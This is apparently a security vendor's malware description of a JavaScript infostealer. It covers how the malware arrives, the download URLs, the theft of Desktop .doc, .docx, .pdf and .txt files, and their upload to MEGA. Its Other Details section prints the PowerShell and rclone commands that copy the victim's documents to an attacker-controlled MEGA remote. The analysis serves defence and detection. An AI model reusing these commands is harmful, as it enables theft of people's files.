TrojanSpy.JS.INFOSTEALER.B

This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It does not have any propagation routine.

It does not have any backdoor routine.

It steals certain information from the system and/or the user.

Arrival Details

This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan Spy adds the following processes:

• powershell -enc {encrypted payload}

Propagation

This Trojan Spy does not have any propagation routine.

Backdoor Routine

This Trojan Spy does not have any backdoor routine.

Rootkit Capabilities

This Trojan Spy does not have rootkit capabilities.

Download Routine

This Trojan Spy downloads the file from the following URL and renames the file when stored in the affected system:

• %User Temp%\document.pdf
• %User Temp%\a.zip

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It connects to the following website(s) to download and execute a malicious file:

• https://{BLOCKED}lldogs.com/uploads/HZPV78IN74/document.pdf
• https://{BLOCKED}lldogs.com/uploads/HZPV78IN74/a.zip

Information Theft

This Trojan Spy steals the following information:

• Files from the %Desktop% with the following extensions/patterns:
  • *.doc
  • *.docx
  • *.pd*
  • *.txt
• The files must be up to 2 years old

(Note: %Desktop% is the current user's desktop, which is usually C:\Documents and Settings\{User Name}\Desktop on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\Desktop on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Stolen Information

This Trojan Spy sends the gathered information via HTTP POST to the following URL:

• https://g.api.mega.co.nz/cs?id={sessionId}

Other Details

This Trojan Spy does the following:

• After downloading the zip file (%User Temp%/a.zip), it will execute the following powershell commands:
  • Expand-Archive $f -DestinationPath ./ → extracts the file inside a.zip (l.exe)
  • Copy-Item -Path .\l.exe -Destination $ENV:USERPROFILE; → the extracted file (l.exe) is copied to the %User Profile% folder
  • .\l.exe config create remote mega user {email} pass {password} →l.exe is a copy of rclone, which is a legitimate cloud sync tool but can be abused for data theft
  • .\l.exe copy --max-age 2y $ENV:USERPROFILE\Desktop\ remote:backup -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 --bwlimit 100M --include "*.doc" --include "*.docx" --include "*.pd*" --include "*.txt" -P → uploads files that match the patterns to a MEGA url

(Note: %User Profile% is the current user's profile folder, which is usually C:\Documents and Settings\{user name} on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name} on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It does not exploit any vulnerability.